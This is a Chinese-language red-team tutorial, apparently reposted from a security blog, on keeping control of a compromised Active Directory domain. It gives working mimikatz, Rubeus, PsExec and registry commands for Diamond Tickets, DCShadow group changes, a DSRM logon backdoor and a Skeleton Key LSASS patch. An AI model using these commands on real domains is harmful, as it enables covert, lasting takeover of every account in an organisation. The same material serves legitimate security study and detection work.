ActiveDirectory域权限维持

admin 2026-07-10 07:18:18 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍了ActiveDirectory域环境中五种高级权限维持技术,包括DiamondTicket、SapphireTickets、DCShadow、DSRM账户后门和SkeletonKey。这些技术通过修改Kerberos票据、滥用复制机制或修补LSASS内存实现持久化控制,强调攻击者利用合法认证流程规避检测。防御者需监控异常Kerberos流量和LSASS行为,并加强域控制器安全配置。 综合评分: 84 文章分类: 渗透测试,红队,内网渗透,安全工具,漏洞分析


cover_image

Active Directory 域权限维持

原创

时时安全 时时安全

时时安全

2026年7月5日 07:29 安徽

在小说阅读器读本章

去阅读

在企业环境中,大多数使用的都是域环境,在后渗透中就需要进行域环境的权限维持来造成持续危害。

这里就不讲常见的黄金白银票据了

Diamond Ticket

在 Active Directory 中,用户通过密钥分发中心(也就说kdc) 进行身份验证,身份验证期间会发送票据 TGT,这样用户就可以使用这个票据来访问域环境中的各项服务。

在之前用到的黄金票据是完全伪造的,而现在讲到的 Diamond Ticket 也就是钻石票据的原理不一样,它首先是通过真正的 kdc 获取到 合法的 TGT,然后使用 KRBTGT 账户哈希解密这个票据,然后修改特权属性证书 PAC ,注入提升的权限,并在使用前重新加密票据,因为这个票据是走的合法的 kerberos 认证流程,所以可以更自然的融入正常的身份验证流量中。

首先是获取到 krbtgt aes256密钥的密钥,这里使用的是dcsync攻击来获取哈希值

mimikatz.exe "privilege::debug" "lsadump::dcsync /user:krbtgt"

然后就可以利用 rubeus.exe 工具获取一个合法的 TGT

Rubeus.exe diamond /krbkey:<KRBTGT_AES256> /user:lowpriv /password:P@ssw0rd123 /enctype:aes256 /ticketuser:Administrator /domain:domain.local /ticketuserid:500 /groups:512,519 /ldap /opsec /nowrap

这里请求了以后就对其进行了修改,并且注入了与管理员和高权限域组关联的权限提升。

这里根据获取到的数据,就可以通过解码,然后转换为 kerberos 凭证缓存。

echo&nbsp;"BASE64"&nbsp;| base64 -d > lowpriv.kirbi
impacket-ticketConverter lowpriv.kirbi lowpriv.ccache
export&nbsp;KRB5CCNAME=lowpriv.ccache
nxc smb domain.local --use-kcache

ccache 文件加载完毕后,Impacket 或 NetExec 中的工具可以使用注入的 Kerberos 票据进行身份验证,而无需明文凭据。

Sapphire Tickets

这里讲的是蓝宝石票据,攻击者并不伪造 PAC信息,而是通过 S4U 委托功能从特权用户提取合法的 PAC,并将该真实 PAC 嵌入到修改后的票据中,正常伪造的票据都是创建假的 PAC 数据,但是蓝宝石票据用的是域自身生成的合法数据。

这种票据是存在有效期的,一般为十小时,因为这里是继承的 Kerberos 有效期设置。

DCShadow

DCShadow 方式是滥用 Active Directory 内部依赖的复制机制。通常情况下,域控制器之间会自动复制更改,所以这种方式容易被认为合法行为。

这里需要把一个受害机器伪造为域控制,并且通过复制协议向 Active Directory 推送任意更改,所以就需要管理员权限。

在操作之前,需要先要把一个普通的权限提升为管理员权限

例如

.\PsExec.exe \\delivery -u sekvoya.local\service_adm -p P@ssw0rd123! -s powershell

然后再用 Mimikatz 修改账户

.\mimikatz.exe&nbsp;"privilege::debug"&nbsp;"lsadump::dcshadow /object:CN=lowpriv,CN=Users,DC=sekvoya,DC=local /attribute:primaryGroupID /value:512"&nbsp;"exit"

然后再从另外一个新窗口更改

.\mimikatz.exe&nbsp;"privilege::debug"&nbsp;"lsadump::dcshadow /push"&nbsp;"exit"

推送完成后,用户将通过基于复制的操作成为域管理员成员。

DSRM账户后门

每个域控制器都包含一个本地目录服务还原模式管理员帐户,通常称为 DSRM 帐户。

这个账户的主要作用是紧急恢复机制,用于还原或修复 Active Directory 服务。默认情况下,域正常运行时,DSRM 帐户无法通过网络进行身份验证。但是,修改注册表可以改变此行为。

首先需要连接到域控制器并导出本地 SAM 数据库。

这样就可以拿到与 DSRM 账户关联的本地管理员哈希,然后就可以把 DSRM 账户的网络登陆功能开启。

reg add&nbsp;"HKLM\System\CurrentControlSet\Control\Lsa"&nbsp;/v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f

修改注册表值后,即使 Active Directory 完全运行,DSRM 帐户也可以进行远程身份验证。

Skeleton Key

Skeleton Key 不会修改 Kerberos 票据或复制数据,而是直接在域控制器上修补 LSASS 内存。修补完成后,域控制器会接受一个适用于所有域帐户的通用主密码,同时仍然能够正常接受用户的合法密码。从用户的角度来看,一切似乎都没有受到影响。所有用户都可以像往常一样登录。但是攻击者得到了使用注入的住秘密还有用任何账户身份验证的能力。

..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command&nbsp;'"privilege::debug" "misc::skeleton"'

Skeleton Key 的主要局限性在于它仅存在于内存中。重启域控制器会移除该补丁,除非黑客已准备好其他持久化机制来自动重新应用它。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:时时安全 时时安全 时时安全《Active Directory 域权限维持》

网安AI速报|2026.07.06 网络安全文章

网安AI速报|2026.07.06

文章总结: 今日网安AI速报聚焦AI越狱攻防与多项安全威胁。Anthropic推出越狱防护刑法系统,同时Claude工程师发布突破工具,反映大模型安全核心矛盾。
评论:0   参与:  0